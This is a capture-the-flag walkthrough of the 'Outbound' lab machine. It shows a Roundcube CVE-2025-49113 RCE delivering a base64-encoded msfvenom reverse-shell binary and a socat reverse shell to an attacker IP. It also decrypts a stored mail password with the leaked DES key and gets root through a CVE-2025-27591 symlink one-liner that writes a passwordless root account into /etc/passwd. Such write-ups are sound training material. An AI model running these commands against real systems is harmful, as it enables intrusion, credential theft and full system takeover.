![[Outbound.png]]
# **Nmap Results**
```bash
# Replace <target_ip> and <target_domain>
echo -e "\ntarget_ip=10.129.32.146\ntarget_domain=outbound.htb" | tee -a ~/.bashrc
exec bash
echo "$target_ip $target_domain" | sudo tee -a /etc/hosts
mkdir -p ~/my_data/$target_domain/nmap && cd ~/my_data/$target_domain
# Scan all TCP ports
sudo nmap -sC -sV -oA nmap/full.tcp -p- $target_ip -vvv
# Scan top 1000 UDP ports
sudo nmap -sU -oA nmap/initial.udp $target_ip -vvv
# Scan top 100 UDP ports using a faster timing template
sudo nmap -sU -oA nmap/initial.udp -T4 -F $target_ip -vvv
```
```text
# Nmap 7.94SVN scan initiated Wed Oct 15 20:08:55 2025 as: nmap -sC -sV -oA nmap/full.tcp -p- 10.129.32.146
Nmap scan report for outbound.htb (10.129.32.146)
Host is up (0.0090s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_ 256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open http nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://mail.outbound.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct 15 20:09:11 2025 -- 1 IP address (1 host up) scanned in 16.81 seconds
```
# **Service Enumeration**
## **TCP/80**
### **Roundcube Webmail**
Navigated to `http://mail.outbound.htb/` and used the provided credentials, `tyler::LhKL1o9Nm3X2`, to log in to the Roundcube Webmail portal. Nothing was seen in the user's inbox, and the email client software version was identified.
![[Outbound - Roudcube Webmail Version.png]]
# **Exploit**
## **CVE‑2025‑49113**
The version running on the target is vulnerable to CVE‑2025‑49113, which is a post-auth remote code execution vulnerability via PHP object deserialization.
```bash
wget https://raw.githubusercontent.com/fearsoff-org/CVE-2025-49113/refs/heads/main/CVE-2025-49113.php -O CVE-2025-49113.php
```
Validated that RCE is possible by having the target perform a GET request.
```bash
python3 -m http.server 8081
php CVE-2025-49113.php http://mail.outbound.htb tyler LhKL1o9Nm3X2 'wget http://10.10.14.19:8081/index.html'
```
Attempted to use the standard reverse shell, but it kept dying. For a more stable C2 channel, I decided to create a `msfvenom` payload, `base64` encode it, transfer it to the target, and run it.
```bash
# Create the implant and base64 encode it
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.19 LPORT=58951 -f elf -o reverse.elf
base64 -w0 reverse.elf
# Start a listener on the op station
nc -lvnp 58951
# Exploit the vulnerability to upload and execute the implant
php CVE-2025-49113.php http://mail.outbound.htb tyler LhKL1o9Nm3X2 'echo "f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAwgAAAAAAAAAMAQAAAAAAAAAQAAAAAAAAailYmWoCX2oBXg8FSJdIuQIA5kcKCg4TUUiJ5moQWmoqWA8FagNeSP/OaiFYDwV19mo7WJlIuy9iaW4vc2gAU0iJ51JXSInmDwU=" | base64 -d > /tmp/a; chmod +x /tmp/a; /tmp/a'
```
## **Finding MySQL Credentials, DES Key, and Session Information**
During initial enumeration, a configuration file was found. Within said file was a password and `des_kay`. The key will come into play later.
```bash
cat /var/www/html/roundcube/config/config.inc.php
```
```bash
...SNIP...
$config['db_dsnw'] = 'mysql://roundcube:RCDBPass2025@localhost/roundcube';
...SNIP...
// This key is used to encrypt the users imap password which is stored
// in the session record. For the default cipher method it must be
// exactly 24 characters long.
// YOUR KEY MUST BE DIFFERENT THAN THE SAMPLE VALUE FOR SECURITY REASONS
$config['des_key'] = 'rcmail-!24ByteDESkey*Str';
...SNIP...
```
To take advantage of the `mysql` credentials, the `netcat` shell needed to be upgraded to a pseudo-TTY shell. The target system did not have `python` installed, so a statically linked `socat` binary was uploaded to the target.
```bash
# Host the statically linked socat binary on the op station
python3 -m http.server 8081
# Start a listener on the op station
nc -lvnp 58952
# Exploit the vulnerability to upload and execute socat
php CVE-2025-49113.php http://mail.outbound.htb tyler LhKL1o9Nm3X2 'wget http://10.10.14.19:8081/socat -O /tmp/s; chmod +x /tmp/s; nohup /tmp/s TCP:10.10.14.19:58952 EXEC:'sh',pty,stderr,setsid,sigint,sane'
```
Connect to the `mysql` instance.
```
mysql -u roundcube -pRCDBPass2025
```
List available databases.
```
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| roundcube |
+--------------------+
2 rows in set (0.002 sec)
```
Select the database to use.
```
MariaDB [(none)]> use roundcube;
use roundcube;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
```
Show available tables in the database.
```
MariaDB [roundcube]> show tables;
show tables;
+---------------------+
| Tables_in_roundcube |
+---------------------+
| cache |
| cache_index |
| cache_messages |
| cache_shared |
| cache_thread |
| collected_addresses |
| contactgroupmembers |
| contactgroups |
| contacts |
| dictionary |
| filestore |
| identities |
| responses |
| searches |
| session |
| system |
| users |
+---------------------+
17 rows in set (0.001 sec)
```
Display the contents of the `users` table horizontally.
```
MariaDB [roundcube]> select * from users\G
select * from users\G
*************************** 1. row ***************************
user_id: 1
username: jacob
mail_host: localhost
created: 2025-06-07 13:55:18
last_login: 2025-06-11 07:52:49
failed_login: 2025-10-16 02:53:49
failed_login_counter: 3
language: en_US
preferences: a:1:{s:11:"client_hash";s:16:"hpLLqLwmqbyihpi7";}
*************************** 2. row ***************************
user_id: 2
username: mel
mail_host: localhost
created: 2025-06-08 12:04:51
last_login: 2025-06-08 13:29:05
failed_login: 2025-10-16 02:27:59
failed_login_counter: 1
language: en_US
preferences: a:1:{s:11:"client_hash";s:16:"GCrPGMkZvbsnc3xv";}
*************************** 3. row ***************************
user_id: 3
username: tyler
mail_host: localhost
created: 2025-06-08 13:28:55
last_login: 2025-10-16 02:29:42
failed_login: 2025-10-16 01:37:53
failed_login_counter: 1
language: en_US
preferences: a:2:{s:11:"client_hash";s:16:"5HgZDhZGyrNnR2b7";i:0;b:0;}
3 rows in set (0.000 sec)
```
Display the contents of the `session` table horizontally.
```
MariaDB [roundcube]> select * from session\G
select * from session\G
*************************** 1. row ***************************
sess_id: 6a5ktqih5uca6lj8vrmgh9v0oh
changed: 2025-06-08 15:46:40
ip: 172.17.0.1
vars: bGFuZ3VhZ2V8czo1OiJlbl9VUyI7aW1hcF9uYW1lc3BhY2V8YTo0OntzOjg6InBlcnNvbmFsIjthOjE6e2k6MDthOjI6e2k6MDtzOjA6IiI7aToxO3M6MToiLyI7fX1zOjU6Im90aGVyIjtOO3M6Njoic2hhcmVkIjtOO3M6MTA6InByZWZpeF9vdXQiO3M6MDoiIjt9aW1hcF9kZWxpbWl0ZXJ8czoxOiIvIjtpbWFwX2xpc3RfY29uZnxhOjI6e2k6MDtOO2k6MTthOjA6e319dXNlcl9pZHxpOjE7dXNlcm5hbWV8czo1OiJqYWNvYiI7c3RvcmFnZV9ob3N0fHM6OToibG9jYWxob3N0IjtzdG9yYWdlX3BvcnR8aToxNDM7c3RvcmFnZV9zc2x8YjowO3Bhc3N3b3JkfHM6MzI6Ikw3UnYwMEE4VHV3SkFyNjdrSVR4eGNTZ25JazI1QW0vIjtsb2dpbl90aW1lfGk6MTc0OTM5NzExOTt0aW1lem9uZXxzOjEzOiJFdXJvcGUvTG9uZG9uIjtTVE9SQUdFX1NQRUNJQUwtVVNFfGI6MTthdXRoX3NlY3JldHxzOjI2OiJEcFlxdjZtYUk5SHhETDVHaGNDZDhKYVFRVyI7cmVxdWVzdF90b2tlbnxzOjMyOiJUSXNPYUFCQTF6SFNYWk9CcEg2dXA1WEZ5YXlOUkhhdyI7dGFza3xzOjQ6Im1haWwiO3NraW5fY29uZmlnfGE6Nzp7czoxNzoic3VwcG9ydGVkX2xheW91dHMiO2E6MTp7aTowO3M6MTA6IndpZGVzY3JlZW4iO31zOjIyOiJqcXVlcnlfdWlfY29sb3JzX3RoZW1lIjtzOjk6ImJvb3RzdHJhcCI7czoxODoiZW1iZWRfY3NzX2xvY2F0aW9uIjtzOjE3OiIvc3R5bGVzL2VtYmVkLmNzcyI7czoxOToiZWRpdG9yX2Nzc19sb2NhdGlvbiI7czoxNzoiL3N0eWxlcy9lbWJlZC5jc3MiO3M6MTc6ImRhcmtfbW9kZV9zdXBwb3J0IjtiOjE7czoyNjoibWVkaWFfYnJvd3Nlcl9jc3NfbG9jYXRpb24iO3M6NDoibm9uZSI7czoyMToiYWRkaXRpb25hbF9sb2dvX3R5cGVzIjthOjM6e2k6MDtzOjQ6ImRhcmsiO2k6MTtzOjU6InNtYWxsIjtpOjI7czoxMDoic21hbGwtZGFyayI7fX1pbWFwX2hvc3R8czo5OiJsb2NhbGhvc3QiO3BhZ2V8aToxO21ib3h8czo1OiJJTkJPWCI7c29ydF9jb2x8czowOiIiO3NvcnRfb3JkZXJ8czo0OiJERVNDIjtTVE9SQUdFX1RIUkVBRHxhOjM6e2k6MDtzOjEwOiJSRUZFUkVOQ0VTIjtpOjE7czo0OiJSRUZTIjtpOjI7czoxNDoiT1JERVJFRFNVQkpFQ1QiO31TVE9SQUdFX1FVT1RBfGI6MDtTVE9SQUdFX0xJU1QtRVhURU5ERUR8YjoxO2xpc3RfYXR0cmlifGE6Njp7czo0OiJuYW1lIjtzOjg6Im1lc3NhZ2VzIjtzOjI6ImlkIjtzOjExOiJtZXNzYWdlbGlzdCI7czo1OiJjbGFzcyI7czo0MjoibGlzdGluZyBtZXNzYWdlbGlzdCBzb3J0aGVhZGVyIGZpeGVkaGVhZGVyIjtzOjE1OiJhcmlhLWxhYmVsbGVkYnkiO3M6MjI6ImFyaWEtbGFiZWwtbWVzc2FnZWxpc3QiO3M6OToiZGF0YS1saXN0IjtzOjEyOiJtZXNzYWdlX2xpc3QiO3M6MTQ6ImRhdGEtbGFiZWwtbXNnIjtzOjE4OiJUaGUgbGlzdCBpcyBlbXB0eS4iO311bnNlZW5fY291bnR8YToyOntzOjU6IklOQk9YIjtpOjI7czo1OiJUcmFzaCI7aTowO31mb2xkZXJzfGE6MTp7czo1OiJJTkJPWCI7YToyOntzOjM6ImNudCI7aToyO3M6NjoibWF4dWlkIjtpOjM7fX1saXN0X21vZF9zZXF8czoyOiIxMCI7
1 row in set (0.001 sec)
```
The `vars` column contains base64 encoded data. The data was saved to a local file and decoded. Important fields are `username` and `password`.
```bash
cat session_id.txt | base64 -d
```
```
language|s:5:"en_US";imap_namespace|a:4:{s:8:"personal";a:1:{i:0;a:2:{i:0;s:0:"";i:1;s:1:"/";}}s:5:"other";N;s:6:"shared";N;s:10:"prefix_out";s:0:"";}imap_delimiter|s:1:"/";imap_list_conf|a:2:{i:0;N;i:1;a:0:{}}user_id|i:1;username|s:5:"jacob";storage_host|s:9:"localhost";storage_port|i:143;storage_ssl|b:0;password|s:32:"L7Rv00A8TuwJAr67kITxxcSgnIk25Am/";login_time|i:1749397119;timezone|s:13:"Europe/London";STORAGE_SPECIAL-USE|b:1;auth_secret|s:26:"DpYqv6maI9HxDL5GhcCd8JaQQW";request_token|s:32:"TIsOaABA1zHSXZOBpH6up5XFyayNRHaw";task|s:4:"mail";skin_config|a:7:{s:17:"supported_layouts";a:1:{i:0;s:10:"widescreen";}s:22:"jquery_ui_colors_theme";s:9:"bootstrap";s:18:"embed_css_location";s:17:"/styles/embed.css";s:19:"editor_css_location";s:17:"/styles/embed.css";s:17:"dark_mode_support";b:1;s:26:"media_browser_css_location";s:4:"none";s:21:"additional_logo_types";a:3:{i:0;s:4:"dark";i:1;s:5:"small";i:2;s:10:"small-dark";}}imap_host|s:9:"localhost";page|i:1;mbox|s:5:"INBOX";sort_col|s:0:"";sort_order|s:4:"DESC";STORAGE_THREAD|a:3:{i:0;s:10:"REFERENCES";i:1;s:4:"REFS";i:2;s:14:"ORDEREDSUBJECT";}STORAGE_QUOTA|b:0;STORAGE_LIST-EXTENDED|b:1;list_attrib|a:6:{s:4:"name";s:8:"messages";s:2:"id";s:11:"messagelist";s:5:"class";s:42:"listing messagelist sortheader fixedheader";s:15:"aria-labelledby";s:22:"aria-label-messagelist";s:9:"data-list";s:12:"message_list";s:14:"data-label-msg";s:18:"The list is empty.";}unseen_count|a:2:{s:5:"INBOX";i:2;s:5:"Trash";i:0;}folders|a:1:{s:5:"INBOX";a:2:{s:3:"cnt";i:2;s:6:"maxuid";i:3;}}list_mod_seq|s:2:"10";
```
## **Decrypting DES-EDE3-CBC**
Looking through the Roundcube source code, I identified the functions used to encrypt or decrypt a user's `password`.
```bash
cat /var/www/html/roundcube/program/lib/Roundcube/rcube.php
grep 'public function encrypt' -A 85 /var/www/html/roundcube/program/lib/Roundcube/rcube.php
```
```php
public function encrypt($clear, $key = 'des_key', $base64 = true)
{
if (!is_string($clear) || !strlen($clear)) {
return '';
}
$ckey = $this->config->get_crypto_key($key);
$method = $this->config->get_crypto_method();
$iv = rcube_utils::random_bytes(openssl_cipher_iv_length($method), true);
$tag = null;
// This distinction is for PHP 7.3 which throws a warning when
// we use $tag argument with non-AEAD cipher method here
if (!preg_match('/-(gcm|ccm|poly1305)$/i', $method)) {
$cipher = openssl_encrypt($clear, $method, $ckey, OPENSSL_RAW_DATA, $iv);
}
else {
$cipher = openssl_encrypt($clear, $method, $ckey, OPENSSL_RAW_DATA, $iv, $tag);
}
if ($cipher === false) {
self::raise_error([
'file' => __FILE__,
'line' => __LINE__,
'message' => "Failed to encrypt data with configured cipher method: $method!"
], true, false);
return false;
}
$cipher = $iv . $cipher;
if ($tag !== null) {
$cipher = "##{$tag}##{$cipher}";
}
return $base64 ? base64_encode($cipher) : $cipher;
}
/**
* Decrypt a string
*
* @param string $cipher Encrypted text
* @param string $key Encryption key to retrieve from the configuration, defaults to 'des_key'
* @param bool $base64 Whether or not input is base64-encoded
*
* @return string|false Decrypted text, false on error
*/
public function decrypt($cipher, $key = 'des_key', $base64 = true)
{
// @phpstan-ignore-next-line
if (!is_string($cipher) || !strlen($cipher)) {
return false;
}
if ($base64) {
$cipher = base64_decode($cipher);
if ($cipher === false) {
return false;
}
}
$ckey = $this->config->get_crypto_key($key);
$method = $this->config->get_crypto_method();
$iv_size = openssl_cipher_iv_length($method);
$tag = null;
if (preg_match('/^##(.{16})##/s', $cipher, $matches)) {
$tag = $matches[1];
$cipher = substr($cipher, strlen($matches[0]));
}
$iv = substr($cipher, 0, $iv_size);
// session corruption? (#1485970)
if (strlen($iv) < $iv_size) {
return false;
}
$cipher = substr($cipher, $iv_size);
$clear = openssl_decrypt($cipher, $method, $ckey, OPENSSL_RAW_DATA, $iv, $tag);
return $clear;
}
/**
```
Further enumeration was done to identify which crypto method is configured. Per the config file, Triple DES with three keys is used in CBC mode with unspecified padding.
```bash
grep -i get_crypto_method -R /var/www/html/roundcube
```
```
grep: /var/www/html/roundcube/public_html/roundcube: warning: recursive directory loop
/var/www/html/roundcube/program/lib/Roundcube/rcube_config.php: public function get_crypto_method()
/var/www/html/roundcube/program/lib/Roundcube/rcube.php: $method = $this->config->get_crypto_method();
/var/www/html/roundcube/program/lib/Roundcube/rcube.php: $method = $this->config->get_crypto_method();
```
```bash
grep get_crypto_method -C 5 /var/www/html/roundcube/program/lib/Roundcube/rcube_config.php
```
```
/**
* Return configured crypto method.
*
* @return string Crypto method
*/
public function get_crypto_method()
{
return $this->get('cipher_method') ?: 'DES-EDE3-CBC';
}
/**
```
The two pieces of information used to decrypt `jacob`'s `password` are as follows:
```
# password
L7Rv00A8TuwJAr67kITxxcSgnIk25Am/
# des_key
rcmail-!24ByteDESkey*Str
```
Looking at the decrypt function, I was able to decrypt `jacob`'s password via Cyberchef by doing the following:
1. Base64 decode `password` from the `mysql` instance
2. Convert output to hex
3. Split the hex into the IV and the ciphertext. For DES-EDE3-CBC, the first 8 bytes are the IV (`2fb46fd3403c4eec`) and the remainder is the ciphertext (`0902bebb9084f1c5c4a09c8936e409bf`)
4. Use Cyberchef to decrypt the cipher text by specifying the IV, key, mode, and input format
5. ...
6. Profit
```php
public function decrypt($cipher, $key = 'des_key', $base64 = true)
{
// @phpstan-ignore-next-line
if (!is_string($cipher) || !strlen($cipher)) {
return false;
}
if ($base64) {
$cipher = base64_decode($cipher, true);
if ($cipher === false) {
return false;
}
}
$ckey = $this->config->get_crypto_key($key);
$method = $this->config->get_crypto_method();
$iv_size = openssl_cipher_iv_length($method);
$tag = null;
if (preg_match('/^##(.{16})##/s', $cipher, $matches)) {
$tag = $matches[1];
$cipher = substr($cipher, strlen($matches[0]));
}
$iv = substr($cipher, 0, $iv_size);
// session corruption? (#1485970)
if (strlen($iv) < $iv_size) {
return false;
}
$cipher = substr($cipher, $iv_size);
$clear = openssl_decrypt($cipher, $method, $ckey, \OPENSSL_RAW_DATA, $iv, $tag);
return $clear;
}
```
![[Outbound - Cyberchef Decode and Convert to Hex.png]]
![[Outbound - Cyberchef Decrypt Triple DES.png]]
## **Accessing Roundcube Webmail Portal and Finding SSH Credentials**
Log in to the Roundcube Webmail portal with `jacob`'s credentials. The user has an email in their Inbox with SSH credentials.
```
# Roundcube creds
jacob::595mO8DmwGeD
# SSH creds
jacob::gY4Wr3a1evp4
```
![[Outbound - Jacob's Inbox.png]]
# **Post-Exploit Enumeration**
## **Operating Environment**
> [!tldr]- OS & Kernel
> ```bash
> jacob@outbound:~$ uname -a
Linux outbound 6.8.0-63-generic #66-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 13 20:25:30 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
jacob@outbound:~$ cat /etc/os-release
PRETTY_NAME="Ubuntu 24.04.2 LTS"
NAME="Ubuntu"
VERSION_ID="24.04"
VERSION="24.04.2 LTS (Noble Numbat)"
VERSION_CODENAME=noble
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=noble
LOGO=ubuntu-logo
> ```
> [!tldr]- Current User
> ```bash
> jacob@outbound:~$ id
uid=1002(jacob) gid=1002(jacob) groups=1002(jacob),100(users)
> jacob@outbound:~$ sudo -l
>Matching Defaults entries for jacob on outbound:
> env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
>
>User jacob may run the following commands on outbound:
> (ALL : ALL) NOPASSWD: /usr/bin/below *, !/usr/bin/below --config*, !/usr/bin/below --debug*, !/usr/bin/below -d*
> ```
## **Users and Groups**
> [!tldr]- Local Users
> ```bash
>jacob@outbound:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:101:102::/nonexistent:/usr/sbin/nologin
systemd-resolve:x:992:992:systemd Resolver:/:/usr/sbin/nologin
pollinate:x:102:1::/var/cache/pollinate:/bin/false
polkitd:x:991:991:User for polkitd:/:/usr/sbin/nologin
syslog:x:103:104::/nonexistent:/usr/sbin/nologin
uuidd:x:104:105::/run/uuidd:/usr/sbin/nologin
tcpdump:x:105:107::/nonexistent:/usr/sbin/nologin
tss:x:106:108:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:107:109::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:989:989:Firmware update daemon:/var/lib/fwupd:/usr/sbin/nologin
usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
_laurel:x:999:988::/var/log/laurel:/bin/false
mel:x:1000:1000:,,,:/home/mel:/bin/bash
tyler:x:1001:1001:,,,:/home/tyler:/bin/bash
jacob:x:1002:1002:,,,:/home/jacob:/bin/bash
> ```
> [!tldr]- Local Groups
>```bash
>jacob@outbound:~$ cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:syslog
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:
audio:x:29:
dip:x:30:
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:
staff:x:50:
games:x:60:
users:x:100:mel,tyler,jacob
nogroup:x:65534:
systemd-journal:x:999:
systemd-network:x:998:
systemd-timesync:x:997:
input:x:996:
sgx:x:995:
kvm:x:994:
render:x:993:
lxd:x:101:
messagebus:x:102:
systemd-resolve:x:992:
_ssh:x:103:
polkitd:x:991:
crontab:x:990:
syslog:x:104:
uuidd:x:105:
rdma:x:106:
tcpdump:x:107:
tss:x:108:
landscape:x:109:
fwupd-refresh:x:989:
netdev:x:110:
_laurel:x:988:
docker:x:987:
mel:x:1000:
tyler:x:1001:
jacob:x:1002:
jacob@outbound:~$ cat /etc/group | grep jacob
users:x:100:mel,tyler,jacob
jacob:x:1002:
>```
## **Network Configurations**
> [!tldr]- Network Interfaces
>```bash
>jacob@outbound:~$ ip addr
>1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
> link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
> inet 127.0.0.1/8 scope host lo
> valid_lft forever preferred_lft forever
>2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
> link/ether 00:50:56:b0:9d:a1 brd ff:ff:ff:ff:ff:ff
> altname enp3s0
> altname ens160
> inet 10.129.232.158/16 brd 10.129.255.255 scope global dynamic eth0
> valid_lft 2796sec preferred_lft 2796sec
>3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
> link/ether b6:e1:0c:ec:ea:72 brd ff:ff:ff:ff:ff:ff
> inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
> valid_lft forever preferred_lft forever
>4: veth09f1c36@if2: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
> link/ether 06:19:6d:38:03:90 brd ff:ff:ff:ff:ff:ff link-netnsid 0
>```
>[!tldr]- Open Ports
> ```bash
> jacob@outbound:~$ ss -tanup | grep -i listen
tcp LISTEN 0 4096 127.0.0.1:5000 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.54:53 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 511 [::]:80 [::]:*
tcp LISTEN 0 4096 *:22 *:*
> ```
# **Privilege Escalation**
## **CVE-2025-27591**
Based off post-exploit enumeration, the user `jacob` is able to run the following with `sudo`.
```bash
jacob@outbound:~$ sudo -l
Matching Defaults entries for jacob on outbound:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User jacob may run the following commands on outbound:
(ALL : ALL) NOPASSWD: /usr/bin/below *, !/usr/bin/below --config*, !/usr/bin/below --debug*, !/usr/bin/below -d*
```
Research revealed CVE-2025-27591. Below is a description of the vulnerability.
>A privilege escalation vulnerability existed in the Below service prior to v0.9.0 due to the creation of a world-writable directory at /var/log/below. This could have allowed local unprivileged users to escalate to root privileges through symlink attacks that manipulate files such as /etc/shadow.
Exploiting the vulnerability is as simple as running the following command.
```bash
u=$(id -un root); rm -f /var/log/below/error_"$u".log; ln -s /etc/passwd /var/log/below/error_"$u".log; export LOGS_DIRECTORY=/var/log/below; sudo /usr/bin/below snapshot --begin now 2>/dev/null || true; echo 'pwn::0:0:root:/root:/bin/bash' >> /etc/passwd; su pwn
```
# **Flags**
> [!tldr]- User
>
> `9b42bc6b1f3c383b2c06ee24ce31666a`
> [!tldr]- Root
>
> `11a0209a59511aed084b10ea1d141d38`
# **References**
- [CVE‑2025‑49113](https://www.offsec.com/blog/cve-2025-49113/)
- [CVE‑2025‑49113 POC](https://github.com/fearsoff-org/CVE-2025-49113)
- [Statically Linked socat](https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat)
- [Roundcube - Decrypt password from session-vars](https://www.roundcubeforum.net/index.php?topic=23399.0)
- [Roundcube Source Code](https://github.com/roundcube/roundcubemail/blob/master/program/lib/Roundcube/rcube.php#L845)
- [CVE-2025-27591](https://nvd.nist.gov/vuln/detail/CVE-2025-27591)
- [CVE-2025-27591 POC](https://github.com/rvizx/CVE-2025-27591)